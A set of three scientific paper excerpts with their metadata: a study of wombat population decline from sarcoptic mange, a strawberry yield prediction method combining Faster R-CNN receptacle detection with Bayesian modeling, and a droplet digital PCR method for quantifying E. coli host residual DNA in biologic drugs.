(b) Longitudinal studies of wombat population trajectories in relation to mange
Including the present study, we identified nine published longitudinal studies documenting wombat population trajectories where mange disease was also documented: six from Tasmania and three from New South Wales (table 1).Study durations ranged from 2-9 years and the count of wombats from 79-1342.Of the nine studies, two documented mange outbreaks driving declining wombat populations, with average apparent prevalence estimates 27.7% and 33.9%.By contrast the average apparent prevalence of sarcoptic mange among remaining studies was 10.1% (range 0.0-24.9).Some inter-surveyor differences may exist in the diagnosis of mange across studies, particularly between the NSW and Tasmanian studies.Nevertheless, the general pattern among this limited study set was for population declines to be observed when mange prevalence was greater than 25% and stable when less than 25%.This interpretation may indicate the population at the NSW Wolgan Valley site to be at risk of decline (apparent prevalence 24.9%).
Discussion
Invasive environmentally transmitted parasites have potential to cause declines in host populations independent of host density, but the empirical features associated with variable host and pathogen dynamics are rarely studied in naturally occurring populations.Here, we investigated the epidemiological features of a declining wombat population owing to a sarcoptic mange outbreak, and contrasted longitudinal wombat-mange studies to help understand when host population declines are likely to occur.The study population declined by an average of 80% between 2015-2018 and 2020-2022, exhibiting a high (27%) and slightly increasing apparent prevalence of mange.The population decline was characterized by a 55% range reduction within the study area.Combined with other longitudinal studies, our research suggests wombat populations may be at risk of decline when the apparent prevalence exceeds 25%.This empirical study supports the capacity of environmentally transmitted parasites to cause density independent declines in host populations and suggests prevalence limits may be a useful indicator of impending epizootics.This study represents the third formally documented decline of bare-nosed wombats owing to sarcoptic mange outbreaks.The first S. scabiei-driven decline for any host species was by Gray [29], who discussed the severe decline of bare-nosed wombats over a 5-year period in southern NSW.Although no empirical data were presented, descriptions suggest the decline was likely greater than 80%.More recently a detailed empirical description of S. scabiei causing a 94% decline of wombats in northern Tasmania was made by Martin et al. [7].Like the present study, a host range reduction was also documented [7], and very low numbers of wombats continue to occur there [23].Host population declines associated with S. scabiei are widespread in affected mammals, such as red-fox [30][31][32], kit fox [33], vicuña [34,35], ibex [36,37], chamois [38], grey wolf [11] and coyote [15].Importantly, this research is the first to test for the effect of density in mange epizootics where transmission is principally environmental [9].
A general feature of S. scabiei outbreaks across host species is the extended timeframe over which epizootics take place.Mange outbreaks typically take years to spread through host populations [8], in contrast with many other important wildlife pathogens causing host declines (e.g.[39][40][41]), although not all (e.g.[42]).Whether a host population experiences a decline owing to S. scabiei may be governed by a range of factors, and indeed factors shaping transmission of S. scabiei vary across host species [9].A recent study by Beeton et al. [10] suggested epidemiological outcomes of S. scabiei in bare-nosed wombat populations could be determined by host density, environmental survival of the parasite, host shedding of S. scabiei into burrows, and the rate at which wombats switch burrows.Our research suggests that once an outbreak is initiated, the abundance of bare-nosed wombats (measured as counts of individuals above ground) plays little role in modifying outbreak progression, pathogen prevalence or host decline.Similarly Martin et al. [7] also showed an outbreak in wombats continued unabated, regardless of host abundance.These findings Absolute host abundance/density may not be the most critical factor, and a relative metric such as the ratio of burrows per wombat may be more useful, as this could dictate the extent of shared space use and probability of environmental exposure [17].Given wombats have relatively small and fixed home ranges, the combination of burrow switching, ratio of burrows per wombat, and home range stability may explain why declines continue when host densities are low, and reciprocally, why the apparent prevalence of manage can remain stable in some populations over time [23,43].
A potentially valuable outcome of this study is the relationship between apparent prevalence of mange and whether a wombat population remains stable or declines.While the apparent prevalence threshold of 25% we identified is necessarily tentative because of the relatively small number of studies available, it does provide a reference from which other studies may conservatively consider a warning of local conservation issues.It is also important to acknowledge apparent prevalence is a conservative estimate of true S. scabiei prevalence in wombat populations [27].Under-diagnosis rates are poorly understood, particularly at early stages of infection, and some research suggests 'true' prevalence estimates could be 25% higher than apparent prevalence during epizootics [27].Similarly, population level prevalence estimates may vary among observers, owing to expertise in diagnosing clinical signs.This contributes to some caution in our interpretation of mange prevalence and host decline relationships.However, among the Tasmanian studies a similar consistency of researcher training has been used, giving some confidence that the 25% value may be reasonable.
Figure 1 .Figure 2 .
Figure 1.Declining wombats per survey day over time (a) and time period (b), increasing apparent prevalence of sarcoptic mange over time (c) and time period (d ), and density independent relationship between wombats per survey day and the apparent prevalence of sarcoptic mange (e).Position of points jittered in (b) and (d) for visual clarity.
Table 1 .
Longitudinal studies of wombat populations documenting apparent prevalence of sarcoptic mange and population trajectories.TAS = Tasmania, NSW = New South Wales, NP = National Park. | 2023-08-23T13:04:00.187Z | 2023-08-01T00:00:00.000 | {
"year": 2023,
"sha1": "9442806d61e0e54218af2508042c90322a94c2dc",
"oa_license": "CCBY",
"oa_url": null,
"oa_status": "CLOSED",
"pdf_src": "PubMedCentral",
"pdf_hash": "09b4b502c3060817cf12c452f0808293a3b26c22",
"s2fieldsofstudy": [
"Environmental Science"
],
"extfieldsofstudy": [
"Medicine"
]
} |
257516559 | pes2o/s2orc | v3-fos-license | Prediction of strawberry yield based on receptacle detection and Bayesian inference
The receptacle of strawberry is a more direct part than the flower for predicting yield as they eventually become fruits. Thus, we tried to predict the yield by combining an AI technique for receptacle detection in images and statistical analysis on the relationship between the number of receptacles detected and the strawberry yield over a period of time. Five major cultivars were cultivated to consider the cultivar characteristics and environmental factors for two years were collected to consider the climate difference. Faster R–CNN based object detector was used to estimate the number of receptacles per strawberry plant in given two-dimensional images, which achieved a mAP of 0.6587 for our dataset. However, not all receptacles appear on the two-dimensional images, and Bayesian analysis was used to model the uncertainty associated with the number of receptacles missed by the AI. After estimating the probability of fruiting per receptacle, prediction models for the total strawberry yield at the end of harvest season were evaluated. Even though the detection accuracy was not perfect, the results indicated that counting the receptacles by object detection and estimating the probability of fruiting per receptacle by Bayesian modeling are more useful for predicting the total yield per plant than knowing its cumulative yield during the first month.
Introduction
Growth models and prediction models have been developed for various crops. Most of the early growth models were developed for food crops, and research on the development of growth models for horticultural crops has been actively underway since the 2000s. In the Netherlands, growth models of major crops such as ORYZA, LINTUL, and SUCROS have been developed [41]. Reference [10] developed a model to predict the area of the entire leaf using the length of the middle leaf and the width of the left leaf of strawberries.
Zadravec et al. [45] predicted the fruit diameter of apples. In addition to predicting plant growth, predicting the yield has gained attention as it is the most direct outcome of interest for farmers. References [12,13] used a regression method to predict strawberry yield using predictors such as weather data, fungicides and year of cultivation. Reference [29] combined simulations and machine learning algorithms to predict blueberry yield.
Strawberry is a high value-added crop with a worldwide production of 23 tons/ha [14]. Therefore, various growth and yield models have been studied. Logistic, Gompertz, and von Bertalanffy models were used to evaluate growth models and strawberry fruit productions [11], and environmental and growth data were used to predict strawberry growth [3,37]. Some studies have found that weather conditions are more important factors of strawberry yield than flowering and harvest periods [12,13]. In Norway, using historical yield data, a strong correlation was found between strawberry yield and fungicide [12], and the correlation between strawberry yield and temperature varied with the seasons [39]. Reference [25] developed a yield prediction equation using flower number and temperature data. In order to predict strawberry yield, it is necessary to understand the relationship between various parameters. However, most studies have relied on environmental and growth data, and models using strawberry images are lacking [25,37].
As imaging devices such as digital cameras have become cheaper and easier to install due to the improvement of technology, they are widely used in agricultural research. Studies using imaging devices are being conducted on various horticultural crops, and there are many studies on strawberries. References [23,46] have classified the maturation stages of strawberry flowers and fruits using multispectral images taken with a digital camera. Reference [44] acquired specific wavelength images of strawberries using a smartphone camera, and developed a non-destructive, accurate and convenient method for measuring strawberry maturation stages through a multivariate nonlinear model. Another study demonstrated the feasibility of strawberry yield prediction using image-derived variables [1].
In addition, recent studies have utilized artificial intelligence (AI), a technology that artificially implements human learning and perception abilities. Reference [27] developed a model for predicting strawberry yield by using vegetation index, soil characteristics, and plant parameters in an artificial neural network. Reference [30] developed an integrated system for monitoring strawberry hydroponic environment data and determining the harvest time using the IoT-Edge-AI-Cloud concept.
Image techniques have been used to detect targets and collect digital information from various horticultural crops [8,18], but they involve high costs. In this study, a common digital camera and object detection technique which are easier to use and more economic than the other imaging and AI techniques were used. Object detection is a technique for detecting object instances of a certain class (e. g., humans, cars, or buildings) in digital images and videos [9]. The technique has been used for detecting leaves, flowers, and fruits in horticultural areas. For example, in strawberry, an object detection technique which processes images through many layers using a R-CNN (region-based convolutional neural network) was developed to visually display the instances of flowers [21]. Reference [20] detected strawberry flowers in the outdoor field using Deep Neural Network, and the accuracy was 86.1%. A study was conducted to count the number of flowers through a region-based convolutional neural network for RGB images acquired through an unmanned aerial vehicle, and the accuracy was 84.1% [5].
Strawberry flower is a powerful factor for predicting the fruit yield because the flowers will become the fruit [21]. However, detecting flowers have several risks: (1) Strawberry petals are five which can be reduced by aging and disease, (2) the strawberry flower color is white, but it can be confused with the surrounding white objects, and (3) strawberry flowers can overlap with other flowers, which causes the uncertainty of the result of flower detection. Moreover, the receptacle is the more direct factor than the flower, although it could be more difficult to detect as it is smaller than the flower. Strictly speaking, the part that becomes the fruit is the receptacle, in the center of the flower, not the flower itself. To the best of our knowledge, however, there has been no study that detects the receptacle in a strawberry flower for the yield prediction so far.
To mitigate the risks and to predict fruit yield using a more direct factor, detecting the receptacle in a strawberry flower was considered. Strawberries have a yellow receptacle in the center of the flower to become the fruit unlike other plants, and the yellow color of the receptacle is less confusing with the surroundings when compared to the white color of strawberry flower. In this study, the number of receptacles were counted by combining the receptacle images of five strawberry varieties acquired during two cultivation periods with AI technology. One of the challenges is that not all receptacles are detected by the two-dimensional images, so it sometimes underestimates the actual number of receptacles. This uncertainty is estimated by Bayesian modeling, and several yield prediction models were compared. Therefore, the objective of this study was to predict strawberry yield using R-CNN for receptacle detection and Bayesian modeling for uncertainty estimation. Furthermore, yield prediction models considering several factors may be proposed.
Strawberry cultivation and data collection
Five cultivars of strawberry were cultivated for this experiment including 'Keumsil', 'Maehyang', 'Seollhyang', 'Arihyang', and 'Jukhyang'. 'Seolhyang' (84.5%), 'Keumsil' (4.1%), 'Jukhyang' (2.8%), and 'Maehyang' (2.5%) are cultivars that account for most of the distribution rate of domestic strawberries, and 'Arihyang' was recognized for its quality as an export cultivar. Strawberry seedlings were transplanted in two rows in a tunnel-type greenhouse located in the Kyungpook National University (35 • In the 2019-2020 trial, seedlings of 'Keumsil', 'Maehyang', and 'Seollhyang' were obtained from Kyungnam Agriculture Research Station (Jinju, Korea); 'Arihyang' seedlings were obtained from the National Institute of Horticulture and Herbal Science (Wanju, Korea); and 'Jukhyang' was purchased from Damyang-gun Agricultural Technology Center (Damyang, Korea). The first experiment was conducted from September 10, 2019 to April 2, 2020, and it was a randomized complete block design with five replications (22 strawberry transplants for each replication). 'Keumsil', 'Maehyang', and 'Seollhyang' were cultivated 205 days after transplanting (DAT); 'Arihyang' was cultivated 196 DAT; 'Jukhyang' was cultivated 189 DAT. 'Seolhynag', 'Maehyang', 'Keumsil', and 'Arihyang' had a difference in transplanting dates of about a week due to the difference in seedling supply timing, and 'Jukhyang' had different transplanting dates because it was a semi-forcing type. Flower images were taken using a Canon EOS 100D DSLR (Tokyo, Japan) once a week starting from October 16, 2019, the time of appearance of flower stalk. The flower images were taken in the direction and distance where the flower can be seen as best as possible (Fig. 2).
In the 2020-2021 trial, seedlings of Keumsil', 'Maehyang','Seollhyang', and 'Arihyang' were obtained from the same places as the first experiment, respectively; and 'Jukhyang' was purchased from a different seedling company in Damyang-gun (Damyang, Korea). The second experiment was conducted from September 14, 2020 to March 29, 2021, and it was also a randomized complete block design with five replications (20 strawberry transplants for each replication). 'Keumsil' was cultivated 196 DAT; 'Maehyang','Seollhyang', and 'Arihyang' were cultivated 189 DAT; 'Jukhyang' was cultivated 172 DAT. 'Seolhyang', 'Maehyang', 'Geumsil', and 'Arihyang' had slightly different transplant days due to differences in seedling supply time, 'Jukhyang' was transplanted in early October because it is a semi-forcing type. Flower images were taken three times a week from November 16, 2020 in the same way as in the first experiment. Strawberries cultivated in the 2019-2020 season harvested ripe fruit 2-3 times a week from November 26, and strawberries cultivated in the 2020-2021 season harvested ripe fruit every day from December 10th. The number and weight of the harvested strawberries were measured for each cultivar.
Receptacle detection
The 1626 color images of (i.e.) pixels were used for our experiments, introduced above. The subsets were split into training and evaluation sets. The training set consists of 974 images collected during the period from December 18, 2020 to February 15, 2021. The evaluation set consists of 652 images collected during the period from November 6, 2019 to March 19, 2020. One of the authors manually labeled the receptacle(s) in each image of the training set with bounding boxes. The training set was used to train and validate the detection network, and model the relation between the number of receptacles and fruits. The evaluation set was used to estimate the probability of fruit production per receptacle, based on the inferred number of receptacles by the trained network. Because all the images are RGB color images, they correspond to a three-dimensional array form with the shape of (C × H × W), where C is the number of channels (C = 3 for RGB image), H and W are the height and width of each image, respectively (H = 3456 and W = 5184 in our experiments). An RGB image has pixel values ranging from 0 to 255. All the images to 400 × 600 were resized and then normalized all the pixel values by dividing by 255 to range from 0 to 1.
The state-of-the-art object detection methods can be categorized into two approaches: one-stage and two-stage approaches [40]. The one-stage methods, such as YOLO [35], are more concerned with inference speed than detection accuracy. Whereas the two-stage methods, such as Faster R-CNN [36], are more concerned with detection accuracy than inference speed. Because accuracy is generally more important than the speed in long-term horticultural applications, Faster R-CNN was used for the receptacle detection.
Faster R-CNN is an extension of Fast R-CNN [15] by means of a region proposal network (RPN). An RPN enables efficient and accurate region proposal generation with nearly cost-free computation, by sharing convolutional features with the detection network (corresponding to a backbone). The RPN module generates object region proposals by sliding a spatial window over the output feature map from the backbone. Both the backbone and RPN are trained in an end-to-end manner (i.e., not separately trained). A ResNet50 [16] was used as the backbone of the Faster R-CNN. A detailed structure of ResNet50 is described in [16]. To alleviate the data scarcity problem, the ResNet50 pre-trained on the COCO dataset [22] was used, a popular large-scale object detection dataset. The pre-trained network is available on Torchvision package [26]. The whole network was then fine-tuned for 10 epochs using the training set of the strawberry images. The SGD optimizer was used for fine-tuning with a batch size of 2, learning rate of 0.005, momentum of 0.9, and weight decay of 0.0005. The learning rate was decayed by 0.1 for every 3 epochs. PyTorch [32] was used to implement the receptacle detection network.
Due to the limited amount of the bounding-box-labeled strawberry images, the detection accuracy of the network based on 10-Fold cross validation was validated. The mean Average Precision (mAP) [7] was used as the detection evaluation metric, which is one of the primary metrics on object detection. The mAP is computed by averaging multiple values of average precision (AP). The APs are calculated with different Intersection over Union (IoU) thresholds, where the IoU is the ratio of the overlap and union areas between the ground-truth and predicted bounding boxes for an object. It is considered to successfully detect if the IoU is above a pre-defined threshold. The IoU thresholds range from 0.5 to 0.95 at an interval of 0.05. The mAP ranges from 0 to 1 and a higher mAP stands for higher detection accuracy.
Statistical analysis
The goal of statistical analysis was to predict the total number of strawberry fruits at the end of the harvest season. To obtain a strawberry fruit, a plant must have a receptacle, but not all receptacles produce a strawberry fruit. In this regard, it is important to estimate both the number of receptacles and the probability of fruiting per receptacle.
Let n obs be the total number of receptacles detected by the AI based on pictures taken from December 18, 2020 to February 15, 2021 (one picture per plant). Note that not all receptacles were captured by the pictures, so the true total number of receptacles would be greater than n obs . Let N = n obs + n mis be the true number of receptacles, where n mis is the total number of receptacles undetected by the AI. To account for the uncertainty of N, we modeled n obs by a binomial distribution with parameters N and θ, where θ is the unknown proportion of receptacles (per plant) detected by AI. Note that θ is estimable when we have an observed sample of N. We randomly selected 4 plants per cultivar and recorded both n obs and n mis by counting the number of receptacles that a two-dimensional picture captured and did not capture for each plant. This data, combined with the uniform (noninformative) prior on θ, was used to model the posterior distribution of θ (the beta distribution with the shape parameters α = 48 and β = 22), and we obtained the posterior predictive distribution of N per plant.
We let Y be the total number of fruits per plant, and let π be the probability of fruiting per receptacle. Given N, we used a quasibinomial distribution (to account for over-dispersion in the count data) and obtained the posterior distribution of π per each cultivar. Farmers' primary interest is to foresee the total productivity at the end of harvest season, and it depends on the total number of plants in a farm. In this study, we focused on the prediction of the number of fruits per plant using the information available early in the harvest season. We used the first four weeks of data (from December 18, 2020 to January 15, 2021) to model the number of fruits per plant.
For the purpose of concise presentations, we define the following notations. We let μ be the expected number of fruits per plant as of March 26; frt and rec be the rate of change in the average number of fruit and of receptacles per plant, respectively, observed from December 18 to January 15; and prob be the probability of fruiting per receptacle with the logistic transformation. We then compared four multiple regression models: (M1) μ explained by the cultivar only; (M2) μ explained by the cultivar and frt; (M3) μ explained by the cultivar, rec and prob; and (M4) μ explained by the cultivar, rec, prob, and rec × prob (i.e., the interaction between rec and prob).
The four models (M1 to M4) were evaluated by the Akaike Information Criterion (AIC) and the adjusted-R 2 , and their predictive performances were evaluated by the mean square error (MSE) estimated from the leave-one-out-cross-validation (LOOCV). Fig. 3 illustrates two common cases on the receptacle detection. Ground-truth and predicted bounding boxes are represented in green and red, respectively. The receptacle detection is not always perfect. For instance, there was a case where a bee on a receptacle is detected as a receptacle, and there were some cases where the model predicts other objectives (e.g., a leaf) as a receptacle. The left of Fig. 3 stands for the case where the network correctly detected the receptacle(s) in an image. Most results correspond to this case, which means the network was well-trained to detect the receptacle. In contrast, the right of Fig. 3 stands for the case where the network correctly detected not only the labeled but unlabeled receptacles. In the training set, 156 out of 974 training images correspond to this case. Therefore, the somewhat low detection accuracy of mAP 0.6587 would be mainly due to the problem of human mislabeling, and the actual detection accuracy of the network would be higher than that reflected by the mAP of 0.6587. The estimated correlation between AI count and human count was 0.856 (p < 0.0001). When individual images were analyzed, the AI captured 0.19 more receptacles than human, on average. For the two seasons, five strawberry cultivars including 'Arihyang', 'Jukhyang', 'Keumsi', 'Maehyang', and 'Seolhyang' were studied. In the 2019-2020 season, the number of receptacles per plant of 'Arihyang' were statistically significantly more than those of the other cultivars (p = 0.0002) while fruits per plant tended to be less (p = 0.0603) (Fig. 4a-c). The trends led to the result with the lowest fruits per receptacle (p = 0.0036). 'Jukhyang', 'Keumsi', 'Maehyang', and 'Seolhyang' showed similar averages for the number of receptacles per plant, fruits per plant, and fruits per receptacle.
Results
In the 2020-2021 season, the average numbers of receptacles per plant of 'Arihyang' and 'Jukhyang' were statistically significantly higher than those of the other cultivars (p < 0.0001) while fruits per receptacle were statistically significantly less (p = 0.0003). The results, as in the 2019-2020, displayed that the low ratio of fruits per receptacle is a characteristic of 'Arihyang'. The receptacles per plant, fruits per plant, and fruits per receptacle of 'Keumsi', 'Maehyang', and 'Seolhyang' were similar as in the 2019-2020 (Fig. 4d-f).
The AI tended to under-estimate the number of receptacles because not all receptacles can be captured in two-dimensional images. Using the Bayesian analysis described in the statistical analysis section, we accounted for the uncertainty associated with the number of missed receptacles, and Fig. 5. Presents the estimated probability of fruit production per receptacle for each cultivar. The results seem clear that 'Arihyang' and 'Jukhyang' produce more receptacles but are not efficient (i.e., low probabilities of fruiting per receptacle). On the other hand, 'Keumsil' produces less receptacles, but it is very efficient in terms of the probability of fruit production.
Four regression models with the following sets of predictors were compared. Model 1 (M1) considered the cultivar only as a predictor, M2 used the cultivar and the fruit yields during the first month of harvest, M3 used the cultivar, the estimated number of receptacles (rec), and the estimated probability of fruiting per receptacle with logistic transformation (prob), and M4 added a multiplicative term rep × prob in the model. The respective adjusted R-square was 0.235, 0.398, 0.504, and 0.528, and the respective mean square error was 42.6, 34.1, 28.1, and 27.0 estimated by the LOOCV. Among the four models compared, M4 was the best which indicates that the effect of having more receptacles depends on the probability of fruiting, which is a sensible result. In addition, the statistical results indicate that the number of receptacles and the probability of fruiting are more helpful information for yield prediction than knowing the first-month yield prediction (Table 1).
Discussion
The characteristics of the tested five cultivars have been investigated during 2019-2020 and 2020-2021 seasons [3,17]. In the two studies, 'Arihyang' displayed the greatest average fresh weight per fruit among the five cultivars. It may be due to a lower ratio of fruits per receptacle than the other cultivars except 'Jukhyang' which was transplanted later than the other cultivars. Reference [19] reported that the supply of carbon-based compounds available to fruit may be limited by competition from too many sinks during early fruit development. Since flowers or fruitlets can be the sink, the fruit of 'Arihyang', which had more flower that did not become fruit than the other cultivars, may have been larger than the fruit of the other cultivars. Therefore, identifying the characteristics of each cultivars may provide information for predicting strawberry fruit yield according to the cultivars.
Many researchers have reported that object detection can work much faster than humans. Among the object detection techniques, Ref. [42] displayed that the faster R-CNN test-time speed of object detection algorithms we used was 0.2 s, compared to 49 s for R-CNN and 2.3 s for fast R-CNN. Moreover, in our experiments, the detection model successfully detected some receptacles that should be detected but were not detected by humans, suggesting that AI can detect even objects that humans miss. Object detection technologies are advancing rapidly, the accuracy of the detection will be improved. Moreover, with the dramatic increase in the capability, sophistication, and miniaturization of imaging sensors, a lot of digital information will be collected in horticultural area [8,18,38]. But many studies have been conducted in a short period and there are few examples of long-term applications of the technologies in agriculture although most crops take several months to grow and harvest. For instance, Refs. [5,21] developed a strawberry flower detection system for fruit yield prediction using an unmanned aerial vehicle (UAV), digital or RGB camera, and object detection technique but the image data were collected once or every two weeks for four months in the studies. Furthermore, characteristics of various cultivars were not considered and actual fruit yield to predict total fruit yield has not been continuously monitored. On the contrary, the flower images and actual fruit yield during two years with five cultivars were collected in this study.
The limitation of this study is that the receptacle is likely to be obscured like the flower, and the object detection technique missed some receptacles due to two-dimensional photos for model training. We tried to address this caveat by the Bayesian modeling and quantified the uncertainty, and more training data could reduce the uncertainty in the posterior analysis of the Bayesian modeling. Future studies can address the caveat by a bigger training dataset and training multiple photos per plant (from multiple dimensions) to improve the object detection algorithm. Otherwise, if it is difficult to collect much more labeled photos, especially for training, both semi-supervised and self-supervised learnings would become breakthroughs against the data scarcity problem [6]. Although the data scarcity problem was alleviated by using the pre-trained detection model on a large-scale dataset of COCO, there is still a domain mismatch problem. Because the COCO dataset does not contain strawberry images, it is somewhat difficult to say that our object detector, pre-trained on the COCO dataset and then fine-tuned with a small number of strawberry images, is sufficiently optimized for receptacle detection. To this end, some methods based on semi-supervised [24] and/or self-supervised [31] learnings can be considered in future, which are beyond the scope of this paper. The detailed and accurate information about the receptacle is scientifically plausible because the receptacle is the only part that becomes the fruit and the health and maturity level of the flower can be identified and filtrated by the color or shape of the receptacle. In addition to the number of fruits and of receptacles observed for the first four weeks of the harvest season, growth variables (e.g., the number of leaves, leaf length and width, and crown size), environmental variables (e.g., day length and light quality), and detailed factors associated with the quality of receptacle (e.g., receptacle color and shape) may improve the yield prediction in future studies.
Many researchers have designed models and have used the models to actual production processes [2,4,5,28,33,34,43]. For example, when the growth of a horticultural crop is monitored, it may be judged by the designed models so that optimal management decisions might be possible to optimize the growth process. The recent studies [3,17] showed that the fruit yield depends on cultivars, and this current study further provided statistical evidence that the number of receptacles and the probability of producing fruit per receptacle are characteristics of cultivar as well. We used the object detection technique, and we anticipate that advanced objection detection techniques (e.g., accurate count of receptacles by using photos of multiple angles) can improve the predictive modeling with less manual efforts. As we continue this line of research, we expect more benefits from Bayesian modeling by incorporating more prior information.
Conclusion
A combination of an AI technique and statistical strategies was used for yield prediction in strawberry images with uncertainty. The combination achieved a mAP of 0.6587 and proposed models with higher R 2 and lower MSE and AIC. The results indicated that collaboration with AI engineers and statisticians may make a great contribution to predicting strawberry yield. However, we recognized that complementary works such as photo data with mostly well-taken flowers, more photo data to improve efficiency of AI, and application of automatic photography technology should be needed on data collection to improve the accuracy of the prediction. Moreover, future studies with additional growth and environmental variables and receptacle color and shape may overcome the weakness of our data.
Data availability statement
Data included in article/supplementary material/referenced in article.
Additional information
No additional information is available for this paper. | 2023-03-15T15:09:53.869Z | 2023-03-01T00:00:00.000 | {
"year": 2023,
"sha1": "9606405630590777f0bfa04b6c38f6ca5e5aee1f",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.1016/j.heliyon.2023.e14546",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "df87167e3839d038367e61986113618d70b25d44",
"s2fieldsofstudy": [
"Agricultural And Food Sciences"
],
"extfieldsofstudy": []
} |
104134937 | pes2o/s2orc | v3-fos-license | A Direct Droplet Digital PCR Method for E. coli Host Residual DNA Quantification
Injectable drugs manufactured in E. coli must be tested for host residual DNA (hr DNA) impurity in ensuring drug purity and safety. Because of low allowable hr DNA as impurity, highly sensitive methods are needed. Droplet digital PCR (ddPCR) is a new method where the reaction is partitioned into about 20,000 nanoliter-sized droplets and each droplet acts as individual PCR reaction. After completion of end-point PCR, droplets are analyzed for fluorescence and categorized as positive or negative and DNA quantified using Poisson statistics. Here we describe development of a direct E. coli hr DNA dd PCR method where the drug is directly added to the ddPCR reaction. We show that the ddPCR method has acceptable precision and high accuracy, works with different biologic drugs, and compared to qPCR shows higher tolerance of drug matrices. The method does not require DNA extraction or standard curves for quantification of hr DNA in unknown samples.
Introduction
Many recombinant therapeutic proteins are produced in E. coli, e.g., insulin, human growth hormones, insulin-like growth factors, interferons, and interleukins [1].E. coli is preferred as host because of well characterized genome, simplicity associated with cell cultures, rapid growth rates, high levels of expression, and low cost [2] [3] [4].However, biopharmaceuticals manufactured in host cells contain host residual protein and DNA (hr DNA) as impurity and must be removed and quantified in the purified drug before it can be used in patients.
The WHO guidelines recommend the hr DNA levels to be <10 ng per daily dose [5] [6].Typically, the biopharmaceutical industry uses qPCR, which is a sensitive and accurate method for quantification of hr DNA [7] [8].Since qPCR requires generation of a standard curve for each experiment and often DNA extraction, both of which can be time consuming, we evaluated direct droplet digital PCR (ddPCR) as an alternative method [9].In the ddPCR method the PCR reaction is partitioned into about 20,000 individual nanoliter-sized droplets using microfluidics.After the PCR is run to endpoint, the droplet fluorescence is read and analyzed, the number of positive and negative droplets is categorized, and the DNA amount is quantified based on Poisson statistics.After an initial standard curve is generated, future experiments can be run without the need for a DNA standard curve.
The probe, also designed in-house, was FAM-ccgtcacaccatgggagtgggt-TAMRA.
A 10× Assay Mix of the primers and probe was prepared containing 10 µM of each primer and 2.5 µM probe.The mix was stored at -20˚C.Prior to each testing, a qPCR reaction mix was prepared with TaqMan Universal Master Mix II with UNG and 10× Assay Mix so that each 20 µL mix per PCR reaction contained 15 µL of TaqMan Universal Master Mix II, 3.0 µL of 10x Assay Mix and 2.0 µL water.Each PCR reaction contained 20 µL mix and 10 µL of sample with a total volume of 30 µL per well in 96-well optical reaction plate.Generally, 5.0 µL of drug or water and 5.0 µL of standard DNA or water constituted the 10 µL of sample.The drug and the DNA standard were prepared such that the desired amount was present in the 5.0 µL added.PCR cycling conditions were: 2 min at 50˚C, then 10 min at 95˚C followed by 40 cycles each consisting of 15 sec at 95˚C and 1 min at 60˚C.The PCR plates were covered with optical adhesive sheets and placed for amplification in 7500 Fast Real-Time PCR System (Applied Pharmacology & Pharmacy Biosystems) using the Accu SEQ Real-Time PCR Detection Software v2.1.
DDPCR Method
We developed the ddPCR method for E. coli hr DNA based on the qPCR method; the same 10× Assay Mix mentioned above was used with Supermix RDQ.Prior to each testing, a ddPCR reaction mix was prepared so that each 25 µL mix per PCR reaction contained 12.5 µL of Supermix RDQ, 2.5 µL 10x Assay Mix, and 10 µL of sample in wells of a 96-well PCR plate.The amount of drug and standard DNA was added such that the desired amounts were present in the 20 µL picked by Bio-Rad Automate Droplet Generator (ADG) to make droplets.The plate was sealed with Pierceable Foil Heat Seal using a Bio Rad PX1 PCR Plate Sealer for 5 seconds.The plate was briefly spun and put in the ADG for making droplets according to the manufacturer's protocol.The ADG made droplets by mixing with oil, and delivered in identical wells of a fresh PCR plate.The new PCR plate with the droplets was carefully removed from the ADG, sealed, and put in a thermocycler for PCR.The PCR cycling conditions were: 10 min at 95˚C, one cycle followed by 40 cycles consisting of 30 s at 94˚C with 2˚C/sec ramp rate and 1 min at 60˚C with 2˚C/sec ramp rate; then 10 min at 98˚C one cycle and hold at 4˚C indefinitely.After PCR, the plate was transferred to the Bio Rad QX200 Droplet Reader and the fluorescence of individual droplets was read following the manufacturer's protocol.The ddPCR data was analyzed by QuantaSoft ver.1.7.4.0917 software with threshold manually set at 1000 after looking at the 1D scatter of the droplets.
Results and Discussion
The above-mentioned drugs were directly added to the PCR wells for qPCR or ddPCR.The ddPCR results for RP-IG and RP-IR are shown in Figure 1.The positive and negative droplets were well separated with low fluorescence in the negative droplets and no discernable effect of drug on the ddPCR.The ddPCR data analysis software has auto select function for the threshold, either for individual wells or combined wells.However, because of issues with auto settings [10] [11], we decided to set the threshold manually at 1000, which we used for all experiments reported here.We tested the linear range of the ddPCR method by serially diluting the E. coli DNA standard from 1e5 fg to 1.0 fg and performing ddPCR in triplicate over several days.Results exhibit a linear range from 1.0 fg to 1e5 fg of DNA per PCR reaction (Figure 2) and the LOQ was set at The ddPCR results are shown in the y-axis as copies of DNA detected.Based on the DNA standards only, the solid line shows the linear trend line for the mean.The dotted lines show the 95% confidence interval for the individual measurements, calculated by 2.0 RMSE of a log/log fit with slope = 1.The conversion factor of DNA copies to weight in fg was calculated from the inverse of the slope of the standard curve: 1/1.28 ≈ 0.8. 10 fg based on precision of 17.6% RSD.The linearity was maintained with drug added to the DNA standards (Figure 2) with varying precision at 10 fg level, e.g., RSD < 30% for RP-IG, IFN-α and IGF; 33.9% for RP-IR; and 53.7% for IFN-γ.The spike recovery, as a measure of accuracy of the method from the different drugs in the linear range, was about 100% as seen in Figure 2. The ddPCR determined copies of DNA can be converted to weight as shown in Figure 2. Since the size of the E. coli genome is approximately 4.7 Mbps, or about 5.18 fg, the data showed that about 7 copies of the 16s rRNA gene target were present in the E. coli genome.A literature search showed that 1 to 15 copies of the 16 s rRNA gene were present in different bacterial genomes, with an average of seven copies found in E. coli [12] [13].In order to assess sample matrix effect, RP-IR process-intermediate sample and purified drug substance were serially diluted 2-fold and 5.00 to 0.31 µg were tested in qPCR and ddPCR (Table 1).The results showed that qPCR worked only when the samples were diluted to 0.63 µg or lower but ddPCR worked at all levels starting from 5.0 µg.An advantage of ddPCR over qPCR is a relative lack of matrix effect of crude, process intermediate and purified drug on the ddPCR method, as a result allowing testing larger amount of drug (Table 1).However, the hrDNA values determined from the samples by either qPCR or ddPCR were reasonably close to each other (Table 2).
We successfully developed a ddPCR method for E. coli hrDNA without the need for DNA extraction or a standard curve.This method is accurate, precise, and sensitive; tolerant of different sample matrices allowing testing higher drug amounts, and can be used for a wide variety of drug substances produced in E. coli.This method is currently being used for routine testing of samples in our lab.
